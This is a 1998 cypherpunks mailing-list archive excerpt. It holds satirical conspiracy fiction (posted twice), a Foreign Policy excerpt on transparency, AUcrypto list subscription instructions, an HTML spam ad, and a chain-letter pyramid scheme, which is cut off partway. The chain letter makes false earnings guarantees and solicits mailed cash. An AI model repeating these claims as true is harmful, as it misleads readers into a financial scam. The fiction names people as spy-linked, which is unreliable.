Date: Sat, 20 Jun 1998 12:10:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <009C7FCD.1E9A1520.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


RIP - SPACE ALIENS HIDE M DRUGS!!!
___________________________________


  The ReptiliansInBlack and the MenInTheShadows were arguing
vehemently over the best path to take in order to maintain
effective damage control over the increasingly wide-spread
danger posed by the known and unknown actions of the Author. 
Regardless, in the end, they all had to answer to Gomez...

  In the days preceeding the Terry Nichols verdict, they had
managed to divert the Author's attention by murdering his 
aunt in Nevada, Missouri, forcing him to abandon Denver in
the middle of the night to drive to her funeral.
  They had managed to find and destroy the TRIN VirtualNuclear
Diskette Bombs the Author had left at various federal government
buildings in the previous few days, but their agent in Cape
Girardo indicated that the Author also claimed to have planted
the TRIN VNDB's among members of the Nichols jury. Was this
another one of the Author's disinformation tactics, or was
their own double agent at Bureau42 actually a triple agent,
helping to obscure the Author's trail of FUD after his having
lost the Watchers in both Denver and Nevada?
  When the RIP's and the MIS's were notified by Captain Button's
former superiors that the Author had been discovered roaming his
old haunts in Tucson, the BlackBaggers who inventoried his truck
found postcards purchased in Branson, Oklahoma City and Waco. Not
a good sign...


  When the Author posted the 'SweatHog Log' of the SAHMD
manuscripts from Linda Lou Reeds Pima College account, it
was taken as a sign that HeOrShe was once again ready to
jump to another location, and was again challenging the
Watchers to track him. After he led them directly to his
current SafeHouse in Tucson, however, it became clear that
he was once again taunting them by revealing another clue
in the ongoing battle to discover the true extent and/or
existence of the alleged underground computer society known
as the Circle of Eunuchs.
  It wasn't until they met in Tucson with the US Air Force
intelligence officer from Bienfait that the ReptiliansInBlack
and the MenInTheShadows realized the horrendous implications
of the 'clue' that the Author was rubbing their noses in...

  "Bob and Polly McWilliams, sons named Trevor and Rory."
the Flying Spook told those gathered around the conference
table at the back of the Blue Saguaro. "They're friends of
Mark, the owner." he said, causing great consternation among
the various spooks participating in the dinner and drinks
TruthMonger Rap Session taking place--apparently in the
heart of enemy territory.
  As if on cue, the owner approached their table, to inquire
as to the suitability of the food, drinks and service.Y\j
owner, nonchalantly, adding, "I haven't seen you since the
Club Car...are you bugging our conversation?"

  The owner of the Blue Saguaro laughed and winked slyly,
replying, "Not tonight. There's no band, so it's the sound
man's night off..."
  The assorted crew of Casper's Cousins, as they liked to
think of themselves, each began replaying in his or her own
mind the contents of their preceeding conversations, much to
the amusement of Mark and his old pal, the Flying Spook.
  "Tomorrow's edition..." the Flying Spook told his compatriots,
handing each of them a computer printout of the Bienfait Nutly
News. "I'm the new editor-in-chief." He turned and walked away
with the owner, talking over old times...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 20 Jun 1998 12:11:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Reptilians In Black - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C7FCD.50DF5860.3@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


RIP - SPACE ALIENS HIDE M DRUGS!!!
___________________________________


  The ReptiliansInBlack and the MenInTheShadows were arguing
vehemently over the best path to take in order to maintain
effective damage control over the increasingly wide-spread
danger posed by the known and unknown actions of the Author. 
Regardless, in the end, they all had to answer to Gomez...

  In the days preceeding the Terry Nichols verdict, they had
managed to divert the Author's attention by murdering his 
aunt in Nevada, Missouri, forcing him to abandon Denver in
the middle of the night to drive to her funeral.
  They had managed to find and destroy the TRIN VirtualNuclear
Diskette Bombs the Author had left at various federal government
buildings in the previous few days, but their agent in Cape
Girardo indicated that the Author also claimed to have planted
the TRIN VNDB's among members of the Nichols jury. Was this
another one of the Author's disinformation tactics, or was
their own double agent at Bureau42 actually a triple agent,
helping to obscure the Author's trail of FUD after his having
lost the Watchers in both Denver and Nevada?
  When the RIP's and the MIS's were notified by Captain Button's
former superiors that the Author had been discovered roaming his
old haunts in Tucson, the BlackBaggers who inventoried his truck
found postcards purchased in Branson, Oklahoma City and Waco. Not
a good sign...


  When the Author posted the 'SweatHog Log' of the SAHMD
manuscripts from Linda Lou Reeds Pima College account, it
was taken as a sign that HeOrShe was once again ready to
jump to another location, and was again challenging the
Watchers to track him. After he led them directly to his
current SafeHouse in Tucson, however, it became clear that
he was once again taunting them by revealing another clue
in the ongoing battle to discover the true extent and/or
existence of the alleged underground computer society known
as the Circle of Eunuchs.
  It wasn't until they met in Tucson with the US Air Force
intelligence officer from Bienfait that the ReptiliansInBlack
and the MenInTheShadows realized the horrendous implications
of the 'clue' that the Author was rubbing their noses in...

  "Bob and Polly McWilliams, sons named Trevor and Rory."
the Flying Spook told those gathered around the conference
table at the back of the Blue Saguaro. "They're friends of
Mark, the owner." he said, causing great consternation among
the various spooks participating in the dinner and drinks
TruthMonger Rap Session taking place--apparently in the
heart of enemy territory.
  As if on cue, the owner approached their table, to inquire
as to the suitability of the food, drinks and service.Y\j
owner, nonchalantly, adding, "I haven't seen you since the
Club Car...are you bugging our conversation?"

  The owner of the Blue Saguaro laughed and winked slyly,
replying, "Not tonight. There's no band, so it's the sound
man's night off..."
  The assorted crew of Casper's Cousins, as they liked to
think of themselves, each began replaying in his or her own
mind the contents of their preceeding conversations, much to
the amusement of Mark and his old pal, the Flying Spook.
  "Tomorrow's edition..." the Flying Spook told his compatriots,
handing each of them a computer printout of the Bienfait Nutly
News. "I'm the new editor-in-chief." He turned and walked away
with the owner, talking over old times...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 20 Jun 1998 12:12:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Bienfait Reptilian News - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C7FCD.710F1760.7@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


RIP/BNN - SPACE ALIENS HIDE M DRUGS!!!
_______________________________________

Bienfait Nutly News--Desert Storm / Texas Tornado Special:
[BNN-Tucson, Arizona--THE 'FOUR CORNERS' SEARCH FOR A PAIR OF
Certified CopKillers took a bizarre twist today, when it was
learned that the Author of SPACE ALIENS HIDE M DRUGS was
apparently serving merely as a diversionary decoy for LEA's
involved in the search, while an unknown compatriot was busy
either providing clandestine supply support for the pair, or
perhaps even arranging transportation for the suspects to a
safehouse located outside of the search area.
  Under cross-examination by a variety of LEA/Spooks, the 
RCMP involved in setting up the Author on a variety of charges
under the Criminal Code Of Canada admitted that they had been
holding back evidence suggesting that the Author was not acting
alone in his TRIN VirtualNuclear Diskette Bomb Soft Target
World Tour. Newspapers dated after the Author's flight to
semi-safety south of the forty-ninth parallel were found at
the scene of the first VirtualNuclear Device discovered by
the Royal Canadian Mounted Police at the Court House eleven
KILLometers from MongerItaVille, home of the Bienfait Nutly
News, where the Author was scheduled to be railroaded into
serving a four-year sentence for 'Failure To Appear' on the
'Dog At Large' charges trumped up by local Bienfait officials
under RCMP direction.

  "There were two different sets of newspapers dated after
the Author's flight from Canada found at the scene of the
First VirtualNuclear Device." an RCMP official foolishly
revealed to the Flying Spook assigned by the US Air Force
to investigate the Author, never considering that the agent
may have been 'turned' by the Circle of Eunuchs into a
secret ally. "We traced the placement of one of the sets
of newspapers to the Author's nephew, Human Gus-Peter, who
had been promised a new state-of-the-art computer in return
for helping to obstrufucate the details behind the placement
of the TRIN VNDB Device. The second set of newpapers, from
an earlier date, were obviously placed by an unknown entity,
working in collusion with the Author from the beginning."

  The Flying Spook, in his first action as the new editor-
in-chief of the Bienfait Nutly News, informed the RCMP that
the Author, after mailing evidence of RCMP illegal activity,
collusion and conspiracy to a Time/Netly News reportwhore
from Sidney, Montana, had holed up at the Way Station in
Gillette, Montana, for a few days, proceeding south only
after meeting with a shadowy figure who had given one of
the local residents of the homeless shelter a handful of
Canadian coins when asked for spare change.
  The Flying Spook also suggested that the Author's travel
schedule, seemingly laying an interrupted trail through
the HeartLand of paramilitary activity on the way to theYT
targets along the way, was actually a diversionary tactic
designed to divert attention from the movements of his
conspiratorial compatriot--rumored to be a long-time active
member of the Circle of Eunuchs and CyphperPunks Disturbed
Male LISP, as well as a recent inductee into the Army of
Dog.

  The new Editor-In-Chief of the Bienfait Nutly News also
revealed that his investigation into the alleged connection
of the NuclearBomberAdulteress in Minot, North Dakota, and
the ButtonBomberJoyRider from Tucson, Arizona, to the
Circle of Eunuchs and Army of Dog had turned up a variety
of startling facts, despite the Flying Spook's failure to
include those facts in his official report.
  Among those facts are the following:


EveryBody Wants To Go To Soviet Heaven, But No One Wants To Spy:

  It took the Flying Spook only a few weeks to verify hard links
between the Author and a variety of single, double and triple
agents ranging from Scotland to the Middle East--from the 1800's
to the 1990's.
  The Author's background had been invesigated previously, to
little avail, and the Flying Spook was mystified as to how
apparently competent investigators could fail to realize that
the key to covert and subversive links very often lie in the
history of the women 'behind the throne', so to speak.
  Elanor Roosevelt, Lady Byrd Johnson, Nancy Reagan...even
Casper's Cousins unfamiliar with the course of history should
be able to see the implication implied by these recent examples
of the Hidden Hands Of Destiny working through the wives of
those serving as the front men for the true movers and shakers
in society.

  The Zippo lighter bearing the crest of the Naval Guided
Missle School carried by the Author had long been dismissed
as an insignificant detail by a long string of investigators
who crossed paths with HimOrHer at various times and places.
  It was the family history of Polly McWilliams that allowed
the Flying Spook to bring together a wide range of seemingly
individual 'coincidences' into a logical, coherent pattern.

  Clifden Albert Banner:
  Polly McWilliam's brother. A former B-52 bomber pilot with
connections to both the NuclearBomberAdulteress and the
ButtonBomberJoyRider provided the Flying Spook with his first
hard connection between the Author and Armed Forces personnel
suspected of having Circle of Eunuchs connections.
  Major Banner's military history working at top levels of
the Strategic Air Command, as well as with the Joint Chiefs
of Staff at the Pentagon provided the Flying Spook with an
immediate RedFlag that suggested even the remotest connectionYT
what would be found upon further investigation.
  It therefore came as no surprise to find that, after having
put in place a wide variety of possible co-conspirators within
the Armed Forces network, Major Banner retired to become a
Senior Engineering Specialist-Mission Planning System, in the
New England Operations Field Office of GDE Systems, a major
military contractor.
  Neither was it a surprise that Major Banner's specialty
was...computers.


  Jane Banner:

  Polly McWilliam's sister. Heavily involved as a programmer,
for Nortel, with highly sensitive work in an area of the
joint US/Chinese encryption program that was suspected to
have strong covert connections to the CypherPunks and the
Circle of Eunuchs.


  Earl David Banner:
  Polly McWilliam's father. A Boston Globe Journalist who 
had been privy to the most secret of secrets in a comprehensive
array of social circles ranging from the Roosevelts and the
Kennedys to Cardinal Cushing and the Lords of Lourdes.
  Earl Banner's Anglican heritage was in seeming contrast to
his Catholic connections until the Flying Spook discovered
the close connection between the Author's Catholic lineage
through the French Norris clan on his mother's side and the
Catholic lineage of the McWilliams clan to which Polly's
husband, Bob, was a vital link.


  Moyra Banner:
  Polly's McWilliam's mother. Grew up in Montreal and met
her future husband through  sources closely connected to
the Bartonian Metaphysical Society and what was later to
become the Solar Temple Cult--both of which were organizations
with close connections to the Author and David Humisky, a
shadowy figure who had stunned the Canadian Military by
engineering a quick end to a student military-game project
designed to provide information and data on the capability
of military neophytes engaging in spontaneous war games.


  Alan McKenzie:
  Polly McWilliams' great-grandfather. Driven with his family
from the Isle of Lewis, in Scotland, by the Laird, as a result
of his subversive political connections to a Welsh mining rebel
named Bennett, whose grandson, Leslie James Bennett, would rise
out of one of the 'Little Moscows' in South Wales, serving as
a bastion of the British Labour Party, to become the Chief of
the Russian Desk for the RCMP's Security Service, before beingYT
with connections to fellow Red Caspers McClean and Kim Philby.


  Terry Dee:
  A long-time friend and confidante of Bob and Polly 
McWilliams, as well as a shadowy presence in the life of
the Author's decade-long lover in Austin and Tuscon.
  The Flying Spook had originally researched his connection
to the Author as a result of Dee's work for various American
spook agencies during his travels in the Middle East, and
was stunned to discover the close links between Dee's
ancestors--the O'Days--and the Author's great-grandfather,
Clarence Day, whose progeny in Mountain Home, Idaho, once
again completed the Circle between the Author and Major Clif
Banner, as well as filling in the Author's connection to
the Naval Guided Missle School and a wide variety of
suspected Circle of Eunuchs initiates employed at sensitive
military and secret government laboratory sites around
the world.


  Merna Brown:
  The Author's first wife. A member of the Bartonian Metaphysical
Society, and whose father had proved to be a vital link in the
connection between the socialist New Democratic Party of Tommy
Douglas and the suspected Russian agent, James Leslie Bennett.
  Merna Brown had eventually turned up in Ontario in a government
position ideally suited for providing financial and personal
history support for a number of individuals drifting back and
forth between the Solar Temple, Elohim City, Waco and San Diego,
changing identities as they went.


  Dave Foreman:
  The Flying Spook found it interesting that the Author had
appeared to have absolutely no contact with Dave Foreman or
any of the Earth First subversives in Arizona during HisOrHer
time there, yet seemed to be involved in advising and training
a wide variety of those connected to Earth First in various
areas of the country, particularly in Northern California.
  Hidden deep within the mountains of files kept on those who
marched in protests at the LizardMore Lavoratory was a note
which attributed authorship of a song, "We're Going To Take
It Sitting Down," a banner tune for a Berkeley radical group
named La Palomas, to one C.J. Parker, who was also known to
have authored "Don't Blame Me, I Voted For The Monkey."


  Black Elk:
  Equally intriguing was the Author's close connection to a
wide variety of Rainbow Family members thoughout the US and
Canada. While the Author seemingly remained unaware of his
connection to the group, many of the Rainbow Family were notYT
enormous amount of covert support during his wide travels.
  ears of investigation failed to discover the link until
the Flying Spook engaged the Author in WarStories (TM) at
the CoalDust Saloon in Bienfait, and heard a tale about 
HimOrHer joining an oddball van full of misfits including
hippies, college athletes and a Catholic priest, on a trip
to a mountain top in Colorado to await the fulfillment of
the vision written of in "Black Elk Speaks."
  HeOrShe told of the Catholic priest smuggling an ounce of
hashish across the border, shoved up his butt, screwing the
Catholic girls on the trip, and then absolving them, and 
carrying a mountain of liquor up the mountain on his back,
a Herculean task which made him a legend among those at
the gathering who considered a spiritual journey to be
incomplete without a jigger of earthly spirits to ease
their passage.
  The Author told of rising in the middle of the night to
relieve himself of excess spirits and falling into one of
the slit-trench crappers that had been dug for the occassion,
swearing like a trooper as he climbed out, only to fall into
another, and yet another, with the whole gathering laughing
riotously in the dark at the Fool In The Stool, as he called
himself. He had little idea that not only did the whole
gathering know who he was the next day (even though he 
pretended ignorance of the whole affair), but that the story
of his folly had become one of the legends told by the
original members of the Rainbow Family which was born at
the gathering.


  Ken Sleight:
  Government efforts to investigate an alleged underground
railroad for a variety of outlaws, desperados and radicals,
including a trail of SafeHouses and HideOuts throughout
the western US, invariably led to one or another of passages
in and out of the Four Corners area.
  The Author and Utah outfitter Ken Slight were often found
to be operating in close proximity without ever seeming to
have confirmable direct contact. Interestingly, they both
seemed to have contact with a large number of the same
people involved in environmental and survivalist arenas,
including Bob Mason, of Durango, although under an assumed
name.


  XS4ALL:
  InterNet Free Terra both hosted the banned website during
their censorship troubles with the the German government, and
helped a variety of other sites set up mirror sites around the
same time. One of the causes of XS4ALL's troubles was the
publication of how-to tips on derailing trains.
  Although it was confirmed that the Author's travel schedule
coincided with a number of railway 'accidents', including theYT
in the vicinity of Saskatoon, no positive links to HisOrHer
involvement could be established. The Flying Spook's recent
investigation, however, turned up the fact that a variety of
those hosting mirrors of the XS4ALL website had travel 
schedules which coincided with that of the Author at the
times of several railway 'accidents', although, once again,
no positive link between the individuals could be established.



Synchronincidence:
  Time is a trick to keep suspicious minds from positively
connecting Taoist subversive criminal radicals to the events
for which they are obviously responsible.
  Space is a trick to keep Taoist subversive criminal radical
coconspirators from being positively linked together when it
is in the best interests of the government to claim that they
are acting alone.
  Paranoia is a trick to keep non-Taoist subversive criminal
radicals from realizing that most LEAs are real Lamers (TM),
and that the only thing one needs to be paranoid of is paranoia,
itself (it's a vicious cycle...).
  Guilt is a trick to keep psychotic sociopath subversive
criminal radicals from killing everyone at once, so that there
is still someone left to plot against them.


DISCLAIMER!!!
_____________

  The Bienfait Nutly News makes no pretensions of operating
as an ethical and responsible news source for individuals
whose cerebral synapse circuits remain unaffected by moon
phases and solar sunspot activity.
  We accept no responsibility for explaining how the 
translation of Reptilians In Black into an RIP acronym
can go unnoticed by the editor until the end of the piece,
or how a well-researched article can somehow seem to peter
out into a meaningless morass of inconsequential facts and
details.
  Hell, we don't even know what the right-square bracket
is *really* called...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 20 Jun 1998 13:44:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: The End of Secrecy
Message-ID: <199806202043.QAA00585@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "The End of Secrecy," by Ann Florini, Foreign Policy, 
Summer, 1998:

   http://jya.com/teos.htm  (39K)

IMF managing director Michel Camdessus has explained, openness 
and transparency are now economic issues, not solely political 
ones:

  As more and more evidence has come to light about the 
  adverse consequences of governance problems on economic 
  performance--among them, losses in government revenue, 
  lower quality public investment and public services, 
  reduced private investment, and the loss of public 
  confidence in government--a broader consensus has 
  emerged on the central importance of transparency and 
  good governance in achieving economic success.

Most officials in Asia seem to have accepted the virtues 
of transparency, at least in the economic field. Singaporean 
senior minister Lee Kuan Yew, stressing the importance of 
transparency in a country's financial system, recently told 
Vietnamese prime minister Phan Van Khai: "In an age of 
information technology, instant communications and computers, 
if you try to hide, you are in trouble." 

[And:]
               The Entomopter Cometh

One of the most unusual MIT designs on the drawing board is a 
four-inch-long, insect-like craft dubbed "the entomopter," 
equipped with legs for crawling through buildings or ventilation 
ducts, and flapping wings for airborne reconnaissance.

Nevertheless, no matter how small, efficient, or cost-effective 
surveillance hardware becomes, there will always be limits to 
what technology can accomplish. Indeed, it is a double-edged 
sword--witness the polemics in Washington and on the Web over 
who, if anyone, should regulate electronic encryption. From 
untappable communications to pixel-by-pixel photo and video 
editing, technology is often as good at hiding secrets as it 
is at revealing them. Without a norm of transparency, technology 
will continue to protect private information as well as ferret 
it out.

-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Sat, 20 Jun 1998 11:40:35 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: AUcrypto mailinglist
Message-ID: <19980620184014.22630.qmail@iq.org>
MIME-Version: 1.0
Content-Type: text/plain



With things starting to heat up here in Australia (DoD/DSD has
recently taken to making some exceptionally nasty noises about
prosecuting Eric Young, Tim Hudson and the rest of the Australian
CryptoMozilla team). I'd like to remind everyone who's interested in
aussie/nz crypto issues of the aucrypto mailing list.

                    _   _   _  ____ ______   ______ _____ ___
                   / \ | | | |/ ___|  _ \ \ / /  _ \_   _/ _ \
                  / _ \| | | | |   | |_) \ V /| |_) || || | | |
                 / ___ \ |_| | |___|  _ < | | |  __/ | || |_| |
                /_/   \_\___/ \____|_| \_\|_| |_|    |_| \___/

                      Australasian & Pacific Cryptography

               mail the word "subscribe" to aucrypto-request@suburbia.net

                                     or

              mail the word "subscribe" to aucrypto-d-request@suburbia.net
                            (AUCRYPTO weekly digest)


WHEN YOU HAVE SUBSCRIBED
------------------------

    Send in a brief synopsis of who you are and why you are interested
    in AUCRYPTO as your first message to the list (this helps
    to stimulate discussion and debate as well as provide a sense
    of the AUCRYPTO community). As a [small] example:

      "Hello AUCRYPTO! My name is Sara Harding. I'm a technical services
       officer working at the AFP (Australian Federal Police), specialising
       in cryptogrpahic issues."

SUBSCRIBING
-----------

Send mail to:

        aucrypto-request@suburbia.net
or
        aucrypto-d-request@suburbia.net (AUCRYPTO digest)

with the subject or body of:

        subscribe

UN-SUBSCRIBING
-------------

Send mail to:

        aucrypto-request@suburbia.net
or
        aucrypto-d-request@suburbia.net (AUCRYPTO digest)

with the subject or body of:

        unsubscribe aucrypto

POSTING
-------

To send a message to the list, address it to:

        aucrypto@suburbia.net

Messages under 700 bytes in size will not be accepted. Send your
one-liners to nobody@nowhere.org.

REPLYING
--------

If you are replying to a message already on the AUCRYPTO list using
your mail programs reply facility you may have to change the reply
address to aucrypto@suburbia.net. This is because the AUCRYPTO mailing
list program is configured to have return replies sent the author
in order to avoid receiving the replies of misconfigured "vacation"
programs which automatically send email saying "I've gone to the
moon for two weeks to hunt rare bits".

ARCHIVES
--------

Monthly back issues of aucrypto since January 96 are available from:

        ftp://suburbia.net/pub/mailinglists/aucrypto

You can also instruct the mailing list processor to automatically scan and
retrive messages from the archive. It understands the following commands:

        get filename ...
        ls directory ...
        egrep case_insensitive_regular_expression filename ...
        maxfiles nnn
        version

        Aliases for 'get': send, sendme, getme, gimme, retrieve, mail
        Aliases for 'ls': dir, directory, list, show
        Aliases for 'egrep': search, grep, fgrep, find

        Lines starting with a '#' are ignored.
        Multiple commands per mail are allowed.
        Setting maxfiles to zero will remove the limit (to protect you against
        yourself no more than maxfiles files will be returned per request).
        Egrep supports most common flags.

        Examples:
        ls vomume96 (for aucrypto digest)
        ls latest (the latest directory containes the archived messages)
        get latest/12
        egrep some.word latest/*

TECHNICAL
---------

The list processor software is based on the excellent Procmail/Smartlist
by Stephen R. van den Berg <berg@pool.informatik.rwth-aachen.de> with
some minor extensions by Julian Assange <proff@suburbia.net>.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 336688zs@mci.com
Date: Sat, 20 Jun 1998 19:56:24 -0700 (PDT)
To: hello5g@mail99998.com
Subject: Need a Computer??  No Money Down!!
Message-ID: <199806210156.DAA30468@cassiopea.it>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><BODY BGCOLOR="#ffffdf"><FONT  COLOR="#404040" SIZE=3 PTSIZE=10><B>            
            
</P><P ALIGN=CENTER></FONT><FONT  SIZE=5 PTSIZE=15>...BRAND NEW PENTIUM II...</FONT><FONT  SIZE=3 PTSIZE=10></B>            
</FONT><FONT  SIZE=5 PTSIZE=15><B>            
</FONT><FONT  SIZE=5 PTSIZE=14>..COMPUTER..            
            
..NO MONEY DOWN...            
            
...EARN HUGE INCOME....            
only serious inquiries only!</FONT><FONT  SIZE=3 PTSIZE=10>            
</FONT><FONT  SIZE=4 PTSIZE=12>(for more information & application            
 leave your name, fax & phone #)</FONT><FONT  SIZE=3 PTSIZE=10>            
            
    
    
</P><P ALIGN=LEFT>                
More info:                 
put  "COMPUTER" in subject area and            
mailto: fwd617@mycomsoftware.net                                              
                                                   
</FONT>Click Here                                                    
</B>                
</HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Company98 <company98@yahoo.net>
Date: Sun, 21 Jun 1998 00:01:22 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: $36000 in 14 Weeks
Message-ID: <419.435967.00088171company98@yahoo.net>
MIME-Version: 1.0
Content-Type: text/plain


 Hi
     My name is Jacqueline McCormack and I would like to show you how
easy it is to really make a lot of money. I wouldn't be wasting my time doing this if I didn't know this 
system works,and all the money you invest is less than an evening at the movies for two. Anyone surely 
can afford that.

 I received a letter just like the one your reading now from a lady name Karren Liddel and the rest is 
history. Here is the email I received and judge for yourself if this will work or not. This is truly the one 
path I've found to financial freedom. 
         
             Thanks for your time 
                    Jacque
=================================================================
                                
        I Never Thought I'd Be the One Telling You This:

I Actually Read a Piece of E-Mail & I'm Going to Europe on the
Proceeds!


Hello!

My name is Karen Liddell; I'm a 35-year-old mom, wife, and
part-time accountant.  As a rule, I delete all unsolicited "junk"
e-mail and use my account primarily for business.  I received
what I assumed was this same e-mail countless times and deleted
it each time.

About two months ago I received it again and, because of the
catchy subject line,  I finally read it.  Afterwards, I thought ,
"OK, I give in, I'm going to try this.  I can certainly afford to
invest $20 and, on the other hand, there's nothing wrong with
creating a little excess cash."  I promptly mailed four $5 bills
and, after receiving the reports, paid a friend of mine a small
fee to send out some e-mail advertisements for me.  After reading
the reports, I also learned how easy it is to bulk e-mail for
free! 

I was not prepared for the results.  Everyday for the last six
weeks, my P.O. box has been overflowing with $5 bills; many days
the excess fills up an extra mail bin and I've had to upgrade to
the corporate-size box!  I am stunned by all the money that keeps
rolling in!

My husband and I have been saving for several years to make a
substantial down payment on a house.  Now, not only are we
purchasing a house with 40% down, we're going to Venice, Italy to
celebrate!

I promise you, if you follow the directions in this e-mail and be
prepared to eventually set aside about an hour each day to follow
up (and count your money!), you will make at least as much money
as we did.  You don't need to be a wiz at the computer, but I'll
bet you already are.   If you can open an envelope, remove the
money, and send an e-mail message, then you're on your way to the
bank.  Take the time to read this so you'll understand how easy
it is.  If I can do this, so can you!

                       GO FOR IT NOW!!

                       Karen Liddell

The following is a copy of the e-mail I read:

                                
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEY-MAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT AGAIN !!!


You are about to embark on the most profitable and unique program
you may ever see.  Many times over, it has demonstrated and
proven its ability to generate large amounts of cash.  This
program is showing fantastic appeal with a huge and ever-growing
on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It does
not require you to come in contact with people, do any hard work,
and best of all, you never have to leave the house, except to get
the mail and go to the bank!  

This truly is that lucky break you've been waiting for!  Simply
follow the easy instructions in this letter, and your financial
dreams will come true! When followed correctly, this electronic,
multi-level marketing program works perfectly...100% EVERY TIME! 

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc., 
    -  Even retire! 

This is your chance, so don't pass it up!


-----------------------------------------------------------------
                       -----------------
OVERVIEW OF THIS EXTRAORDINARY 
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
-----------------------------------------------------------------
-----------------


Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next
to nothing to produce and e-mail. As with all multi-level
businesses, we build our business by recruiting new partners and
selling our products.  Every state in the U.S. allows you to
recruit new multi- level business online (via your computer).

The products in this program are a series of four business and
financial reports costing $5.00 each.  Each order you receive via
"snail mail" will include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they
ordered.

To fill each order, you simply e-mail the product to the buyer. 
THAT'S IT!  The $5.00 is yours!  This is the EASIEST electronic
multi-level marketing business anywhere! 


           FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******


This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell
them if you don't order them).
     
     *  For each report, send $5.00 CASH, the NAME & NUMBER OF
THE 
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the
person whose 
        name appears on the list next to the report.
  
     *  When you place your order, make sure you order each of
the four
        reports.  You will need all four reports so that you can
save them
        on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of
the four reports. 
         Save them on your computer so they will be accessible
for you to send 
         to the 1,000's of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are
listed next 
     to each report, or their sequence on the list, in any way
other than is
     instructed below in steps "a" through "d" or you will lose
out on the
     majority of your profits.  Once you  understand the way this
works, you'll 
     also see how it doesn't work if you change it.  Remember,
this method 
     has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name
and address 
         under REPORT #1 with your name and address, moving the
one that 
         was there down to REPORT #2.  

    c.  Move the name and address that was under REPORT #2 down
to 
         REPORT #3.  

    d.  Move the name and address that was under REPORT #3 down
to 
         REPORT #4.  

    e.  The name and address that was under REPORT #4 is removed
from
         the list and has NO DOUBT collected their 50 grand.


     Please make sure you copy everyone's name and address
                         ACCURATELY!!!


3.  Take this entire letter, including the modified list of
names, and save 
     it to your computer.  Make NO changes to the instruction
portion of this 
     letter.
  
4.  Now you're ready to start an advertising campaign on the
     WORLDWIDE WEB!  Advertising on the WEB is very, very
inexpensive,
     and there are HUNDREDS of FREE places to advertise. Another
     avenue which you could use for advertising is e-mail lists. 

     You can buy these lists for under $20/2,000 addresses or you
     can pay someone a minimal charge to take care of it for you.

     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them
the report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE 
     ON ALL ORDERS!  This will guarantee that the e-mail THEY
send out,
     with YOUR name and address on it, will be prompt because
they can't
     advertise until they receive the report!


           ------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***


Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT 
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL 
-  Make sure the cash is concealed by wrapping it in at least two
sheets of paper  
-  On one of those sheets of paper, include: (a) the number &
name of the report you are ordering, (b) your e-mail address, and
(c) your postal address.
_________________________________________________________________
REPORT #1 "HOW TO REORGANIZE YOUR TIME TO ACCOMMODATE A HOME
BASED BUSINESS" 

ORDER REPORT #1 FROM:  
            COMPANY98
            3941 E. CHANDLER BLVD
            SUITE 106-142
            PHOENIX, AZ 85044
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND E-MAIL"

ORDER REPORT #2 FROM:
            ACY
            3800 DEWEY AVE #298
            ROCHESTER, NY 14616
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
            BUSINESS RESEARCH ASSOCIATES            
            459 COLUMBUS AVE, SUITE#504
            NEW YORK, NY 10024
_________________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
            BASQUIAT
            PO BOX 1963
            EVANSTON, IL 60204
_________________________________________________________________

-----------------------------------------------------------------
               ---------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
-----------------------------------------------------------------
---------------------------------


Let's say you decide to start small just to see how well it
works. Assume your goal is to get 10 people to participate on
your first level. (Placing a lot of FREE ads on the Internet will
